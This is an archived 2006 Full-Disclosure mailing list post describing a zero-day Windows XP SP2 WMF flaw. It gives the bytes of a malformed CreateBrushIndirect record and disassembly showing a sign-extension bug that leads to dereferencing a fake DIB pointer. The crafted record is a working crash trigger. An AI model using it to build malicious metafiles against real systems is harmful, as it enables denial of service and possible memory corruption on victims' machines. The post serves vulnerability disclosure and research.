lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Date: Mon, 7 Aug 2006 03:34:29 +0400
From: cyanid-E <biz4rre@...il.com>
To: full-disclosure@...ts.grok.org.uk
Subject: 0-day XP SP2 wmf exploit (some details)


There is some details for wannabees :)

1. 'Bad' wmf record:

07 00 00 00

length of record (in words)

FC 02

type (CreateBrushIndirect)

08 00 00 00 00 00 00 80

'packed' (good old Win16 days) LOGBRUSH data:

08 00 - 'packed' lpStyle (may be BS_DIBPATTERNPT [6] or BS_DIBPATTERN8X8 [8])
00 00 00 00 - COLORREF (any)
00 80 - 'packed' lbHatch (any, signed)

2. Sign extension bug:

   _CommonEnumMetaFile:
      ......
      ; normalize 'packed' LOGBRUSH
      movzx eax, word ptr [ebx+6]      ; lbStyle (UINT32(UINT16))
      mov   [ebp-0f8], eax
      mov   eax, [ebx + 8]             ; COLORREF (as is)
      mov   [ebp-0f4], eax
      movsx eax, word ptr [ebx+0c]     ; <-- BUGBUG: lbHatch (UINT32(INT16))
      lea   eax, [ebp-0f8]
      push  eax
      call  _CreateBrushIndirect
      ......

3. Memory access to fake 'pointer to packed DIB' (lbHatch) bug:

      cmp   edi, 6                     ; BS_DIBPATTERNPT == lbStyle
      jz    _go2crush
      ......
      cmp   edi, 8                     ; BS_DIBPATTERN8X8 == lbStyle
      jz    _go2crush
      ......
_go2crush:
      push  esi
      push  1
      push  eax, [ebp+10]
      push  eax
      push  dword ptr [ebp+0c]         ; 1
      push  dword ptr [ebp+18]         ; lpHatch (fake *packedDIB)
      call  _pbmiConvertInfo
      ......
      ......
_pbmiConvertInfo:
      ......
      push  ebx
      mov   ebx, [ebp+8]               ; lpHatch (fake *packedDIB)
      ......
      mov   eax, [ebx]                 ; <-- BUGBUG: crush or random (in first 0x7f00 bytes)
                                       ; memory access (see @ 0x3000 region)


good luck,
cyanid-E

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ